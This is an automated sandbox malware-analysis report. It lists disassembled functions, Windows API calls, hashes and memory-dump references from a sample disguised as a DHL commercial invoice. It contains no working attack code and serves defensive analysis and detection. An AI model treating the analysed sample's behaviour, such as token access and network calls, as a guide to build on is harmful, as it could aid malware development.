API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 74a43f8d5f4b6556e27c767d339bd78e9a4df1997d438f21f7593aeb8d606bea
Instruction ID: fd46379a06a9b4beca9d1fcf9947322c6b43099cf34201dfad0d32ce35ad4846
Opcode Fuzzy Hash: 74a43f8d5f4b6556e27c767d339bd78e9a4df1997d438f21f7593aeb8d606bea
Instruction Fuzzy Hash: 7F11A172501509BFEF128FA4CC44EEB7B69EF18354F010127FA0562150C7369C60DBA8

Function 00423B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00423B56

Part of subcall function 00423AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00423AD2
Part of subcall function 00423AA3: ___AdjustPointer.LIBCMT ref: 00423AED

_UnwindNestedFrames.LIBCMT ref: 00423B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00423B7C
CallCatchBlock.LIBVCRUNTIME ref: 00423BA4

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: cba2e192927fabe95338e8f2681ba899014443c4ece5666d716a894a48ca39e4
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 70018032200158BBCF116E96DC42EEB7F7DEF88759F44401AFE0856121C33AE961DBA4

Function 00433073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004013C6,00000000,00000000,?,0043301A,004013C6,00000000,00000000,00000000,?,0043328B,00000006,FlsSetValue), ref: 004330A5
GetLastError.KERNEL32(?,0043301A,004013C6,00000000,00000000,00000000,?,0043328B,00000006,FlsSetValue,004A2290,FlsSetValue,00000000,00000364,?,00432E46), ref: 004330B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0043301A,004013C6,00000000,00000000,00000000,?,0043328B,00000006,FlsSetValue,004A2290,FlsSetValue,00000000), ref: 004330BF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ac4e29826eddcbdc6b1d3ee23073d414a3116961cdf09809dc0df61eea881cc1
Instruction ID: 928eb022ac10566a03ecd672be19be6db230cea969cd428a119e7f46e4e38b1b
Opcode Fuzzy Hash: ac4e29826eddcbdc6b1d3ee23073d414a3116961cdf09809dc0df61eea881cc1
Instruction Fuzzy Hash: E4012032742622ABCB354F789C84A577BA89F49B73F100632F905D7294C725D901C6E8

Function 00467464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0046747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00467497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004674AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004674CA

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 7944630ef19536910aee981060a8da3353241e127b9519e7ef58df84406ec64f
Instruction ID: beb988d59e00a62ee2ce3875196cc7b0ebf39a15ac90f3719256e2de0d627e3a
Opcode Fuzzy Hash: 7944630ef19536910aee981060a8da3353241e127b9519e7ef58df84406ec64f
Instruction Fuzzy Hash: 1D11A1B5205310ABE7208F14DD4DB927BFCEB40B08F10856BE616D6151EB78E904DFA6

Function 0046B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0046ACD3,?,00008000), ref: 0046B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0046ACD3,?,00008000), ref: 0046B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0046ACD3,?,00008000), ref: 0046B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0046ACD3,?,00008000), ref: 0046B126

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c75bb97d45f2952945b32a975a796f0114d2e7ce6c5e78c3969ed1c5ee721cc8
Instruction ID: 390784155f30ae1bbc1060f16be08973ec1ab4dc5c89e85098efdbc7250ea085
Opcode Fuzzy Hash: c75bb97d45f2952945b32a975a796f0114d2e7ce6c5e78c3969ed1c5ee721cc8
Instruction Fuzzy Hash: B8118E30C0051CEBCF009FE4D9996EEBF78FF5A310F0040A7D941B2245DB3485918B9A

Function 00462DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00462DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00462DD6
GetCurrentThreadId.KERNEL32 ref: 00462DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00462DE4

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 59508c552e3cc7491b23046f1937814a2dca9f13bfeb44d5ad3e72d8d76b17d0
Instruction ID: c59a90da35369f06fa3de70585eb304e511b357d78ff98191718303dcb8779a5
Opcode Fuzzy Hash: 59508c552e3cc7491b23046f1937814a2dca9f13bfeb44d5ad3e72d8d76b17d0
Instruction Fuzzy Hash: C1E092711416247BDB201B729D4EFEB3E6CEFA2BA1F400437F105D1090AAE5C841C6BA

Function 00498863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00419639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00419693
Part of subcall function 00419639: SelectObject.GDI32(?,00000000), ref: 004196A2
Part of subcall function 00419639: BeginPath.GDI32(?), ref: 004196B9
Part of subcall function 00419639: SelectObject.GDI32(?,00000000), ref: 004196E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00498887
LineTo.GDI32(?,?,?), ref: 00498894
EndPath.GDI32(?), ref: 004988A4
StrokePath.GDI32(?), ref: 004988B2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7bc6e9994dd55fd8f7022c5eb541b94d13f54f74bed9d9188e9eeb692abb72c1
Instruction ID: eb68587b9d3d583e4183ff923d5e6d3c68104ba52187840049a69319356bc4ea
Opcode Fuzzy Hash: 7bc6e9994dd55fd8f7022c5eb541b94d13f54f74bed9d9188e9eeb692abb72c1
Instruction Fuzzy Hash: 2BF03A36042258FADB126F94AC0EFCA3F59AF16310F048066FA11651E1C7795551CFBD

Function 004198B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004198CC
SetTextColor.GDI32(?,?), ref: 004198D6
SetBkMode.GDI32(?,00000001), ref: 004198E9
GetStockObject.GDI32(00000005), ref: 004198F1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 11c5f26b568b1e63640573b31119633356310989e2e78dd41cfbb696616d4c47
Instruction ID: ac45f2cb34c74f59573de4f4a4e1fc36368f674dfcfe5289bf1e9ed062af58a6
Opcode Fuzzy Hash: 11c5f26b568b1e63640573b31119633356310989e2e78dd41cfbb696616d4c47
Instruction Fuzzy Hash: CCE06531244244BBDB215B74BC49BD93F10AB22336F04823BF6FA541E2C77546449F18

Function 0046162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00461634
OpenThreadToken.ADVAPI32(00000000,?,?,?,004611D9), ref: 0046163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004611D9), ref: 00461648
OpenProcessToken.ADVAPI32(00000000,?,?,?,004611D9), ref: 0046164F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 8df5ca83e93e752b04bd363793e9e7352183de52f3d8b77dce073e3b21016991
Instruction ID: 411b68ab35329f549b658a19f561e1be6e4162bf62ad0a2b59965ea8ee78cb1b
Opcode Fuzzy Hash: 8df5ca83e93e752b04bd363793e9e7352183de52f3d8b77dce073e3b21016991
Instruction Fuzzy Hash: 06E08635601211EBD7201FE09E4DB473B7CAF64791F18883AF646C9090E6384440C7A9

Function 0045D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0045D858
GetDC.USER32(00000000), ref: 0045D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0045D882
ReleaseDC.USER32(?), ref: 0045D8A3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4ea8d5ce215699fcaba80896e02c5fb2d702ccddd7793033bb46af41cf8c6fe7
Instruction ID: 14c8cf753dd7c871a1456890bbb6bf6f828af7fb0b92da75c78c6187f48285f7
Opcode Fuzzy Hash: 4ea8d5ce215699fcaba80896e02c5fb2d702ccddd7793033bb46af41cf8c6fe7
Instruction Fuzzy Hash: 9FE01AB1C00205DFCF41AFA1D88866DBBB2FB18311F14803AE806E7250CB399942AF59

Function 0045D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0045D86C
GetDC.USER32(00000000), ref: 0045D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0045D882
ReleaseDC.USER32(?), ref: 0045D8A3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a5986440429c24ebaa17a80c779d8c3fae3533a4e75e0991a34354b205f4686e
Instruction ID: 241a95357ab9049e6a5c98e18df3fa8369b260ced04cdedd243e354f444b0b92
Opcode Fuzzy Hash: a5986440429c24ebaa17a80c779d8c3fae3533a4e75e0991a34354b205f4686e
Instruction Fuzzy Hash: 3BE01AB1C00200DFCF409FA0D88866DBBB1BB18310F14802AE806E7250CB3859029F58

Function 00474D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00407620: _wcslen.LIBCMT ref: 00407625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00474ED4

Strings

LPT, xrefs: 00474DFB
*, xrefs: 00474E10

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 0f2de4cef1c92e406f45c7d7bfb68dc7079078a50d24ac693f08300b2e3a752f
Instruction ID: 049d17bd669cf1602bf8e65d896af253228af9f88d60f18a8b1b7b90b9fbb2ad
Opcode Fuzzy Hash: 0f2de4cef1c92e406f45c7d7bfb68dc7079078a50d24ac693f08300b2e3a752f
Instruction Fuzzy Hash: 0D915075A002149FCB14DF54C484EEABBF1AF84318F19C09AE40A9F392D739ED86CB95

Function 0042E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042E30D

Strings

pow, xrefs: 0042E2E5, 0042E302

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b7cb9af4af866a8c42950cd0739b5cf10434c4bccb06c92a1e51be8634eb1266
Instruction ID: 2821bb0f82b8bdc5c553cb181ba7bf057006bf9471061ee984d9b40e4d5b8bc7
Opcode Fuzzy Hash: b7cb9af4af866a8c42950cd0739b5cf10434c4bccb06c92a1e51be8634eb1266
Instruction Fuzzy Hash: 47517EA1B0C10296DB31B719E94237B3B94AF44741F7099ABE4D6423E9DB3D8C819A4E

Function 00487771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0045569E,00000000,?,0049CC08,?,00000000,00000000), ref: 004878DD

Part of subcall function 00406B57: _wcslen.LIBCMT ref: 00406B6A

CharUpperBuffW.USER32(0045569E,00000000,?,0049CC08,00000000,?,00000000,00000000), ref: 0048783B

Strings

<sL, xrefs: 004877C8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sL
API String ID: 3544283678-2840126056
Opcode ID: 5748959d27f900664ddc78cb2de64b8d31efa6dc2385487def3a1804e03c8f01
Instruction ID: 8b3ffcb8c07145f5c2d773d2e34e2ba3481769b4097090b6d640319bd0ba8491
Opcode Fuzzy Hash: 5748959d27f900664ddc78cb2de64b8d31efa6dc2385487def3a1804e03c8f01
Instruction Fuzzy Hash: F4615172914118AACF04FBA5CCA1DFEB378BF14704B54453BE542B3191EF389A05CBA9

Function 0041E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0041E1B1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7c07d687d0d344e73f2dfd5cb023900affe16d9ffcc76a2759b3c5057d0788e8
Instruction ID: bbf735d9ad7b58113628b44a8e7decb8f79f59637d8e95e5a96792833a3e29c1
Opcode Fuzzy Hash: 7c07d687d0d344e73f2dfd5cb023900affe16d9ffcc76a2759b3c5057d0788e8
Instruction Fuzzy Hash: AA513339900206DFDB18DF2AC090AFA7BA8EF19311F24405BEC519B3C1D6389E87CB58

Function 0041F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0041F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0041F2BB

Strings

@, xrefs: 0041F2AF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f90ac7e9df806ae8e8400d4f6093d91cfacfe7719c73916ef53f5c2671a71f02
Instruction ID: e3e0bbd6b779b80f1574f1121f07a00789148acc9043f5faf18348846043bd1c
Opcode Fuzzy Hash: f90ac7e9df806ae8e8400d4f6093d91cfacfe7719c73916ef53f5c2671a71f02
Instruction Fuzzy Hash: C45168714087459BD320AF11DC86BABBBF8FB84304F81896EF1D9510A5EB349529CB6B

Function 00485745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 004857E0
_wcslen.LIBCMT ref: 004857EC

Strings

CALLARGARRAY, xrefs: 004857E6, 004857EB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: b6498c42b7b24083c7318223b762d88d00d8191bc09e7c8628ee91f01136799a
Instruction ID: b902548b1097622b2b007de64ea02a7a2c39ba15d2589f4f2ea8c250aefa9038
Opcode Fuzzy Hash: b6498c42b7b24083c7318223b762d88d00d8191bc09e7c8628ee91f01136799a
Instruction Fuzzy Hash: 2C41B131E002059FCB14FFAAC8818AEBBB5EF59354F10442FE505A7391E7389D81CB98

Function 0047D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0047D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0047D13A

Strings

|, xrefs: 0047D10B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: ba85e0ec0627377281ecdcaabcc0fed5c30b1968579b691c4cdeacdacddbf4ec
Instruction ID: 877ede918cba692cdcd5a11f51ef432f6379ab5f4c14447815848413bd8f36df
Opcode Fuzzy Hash: ba85e0ec0627377281ecdcaabcc0fed5c30b1968579b691c4cdeacdacddbf4ec
Instruction Fuzzy Hash: 78311E71D10219ABCF15EFA5CC85AEE7FB9FF04304F40402AF819B6261D7359956CBA4

Function 0049356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00493621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0049365C

Strings

static, xrefs: 004935BC

Memory Dump Source

